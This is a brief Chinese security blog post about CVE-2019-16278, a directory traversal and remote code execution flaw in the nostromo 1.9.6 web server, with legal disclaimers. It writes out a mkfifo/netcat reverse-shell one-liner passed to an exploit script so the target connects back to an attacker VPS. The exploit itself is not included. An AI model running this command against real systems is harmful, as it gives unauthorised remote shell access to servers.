本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。
前沿描述
最近研究了CVE-2019-16278 ,nostromo 服务器1.9.6 版本的远程代码执行,nostromo服务器是一个开源的web服务器,在unix系统中比较流行,通常用于OpenBSD系统。
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。在我测试时,Nostromo的所有版本,包括最新的1.9.6版本,都存在漏洞。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278
漏洞使用
我利用了目标机器上的netcat反向连接vps获得目标机器的控制权限
命令如下:
./exp.sh x.x.x.x xx ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x xx >/tmp/f’
EXP请自行百度(或者谷歌)。
再次温馨提示:
请勿用于非授权测试
人在做天在看
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全实验室
本文始发于微信公众号(Khan安全攻防实验室):基于CVE-2019-16278的漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论